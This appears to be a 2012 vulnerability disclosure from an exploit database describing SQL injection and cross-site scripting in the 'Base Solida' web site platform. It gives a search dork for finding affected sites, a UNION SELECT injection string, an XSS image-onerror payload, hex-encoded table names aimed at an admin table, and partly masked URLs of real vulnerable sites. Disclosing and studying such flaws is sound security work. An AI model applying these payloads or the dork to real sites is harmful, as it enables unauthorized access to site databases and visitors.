Base Solida Cross Site Scripting & SQL Injection

2012.11.21
Credit: Ur0b0r0x
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
CWE-79

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= INDEPENDENT SECURITY RESEARCHER PENETRATION TESTING SECURITY -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= # Author: Ur0b0r0x # Tiwtte: @Ur0b0r0x # Email: ur0b0r0x_@live.com # Line: GreyHat # Exploit Title: Base Slida - SQL Injection / Cross-Site Scripting Vulnerabilities # Dork: intext:"Sitio Dise&#241;ado y Desarrollado por: Base Slida" # Date: 13/11/2012 # Author: Ur0b0r0x # Url Vendor: http://www.basesolida.com.co/ # Vendor Name: Base Slida # Tested On: Backtrack R3 / Linux Mint # Type: php ------------------- Agreement -------------------- [05/11/2012] - Vulnerability discovered [08/11/2012] - Vendor notified Dont responsed [13/11/2012] - Public disclosure -------------------------------------------------- # Expl0it/P0c ################### http://site.com/Sitio/Index.asp?LANG=&IP= < Sql Vulnerability Path > http://site.com/Sitio/Index.asp?LANG=&IP= < Xss Vulnerability Path > # Exploit/Comand/Sql=> +union+select+1,2,3,4,5,6,7,8,9,10%% # Exploit/Comand/Xss=> "><img src=x onerror=alert("ur0b0r0x");> # Payload/Comand/Sql=> table_schema=0x61646D696E6973747261646F72E / table_name=0x74626C5F6175695F61646D696 # Demo_Xss_Sql_Vulnerabilities http://www.aireamXXXte.com/Sitio/Index.asp?LANG=&IP=62' http://www.pinaXXXdu.co/Sitio/Index.asp?LANG=&IP=115' http://www.autoXXXncia.com/Sitio/Index.asp?LANG=&IP=299' http://www.pXXXopal.com/Sitio/Index.asp?LANG=&IP=98'

References:

http://www.basesolida.com.co/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top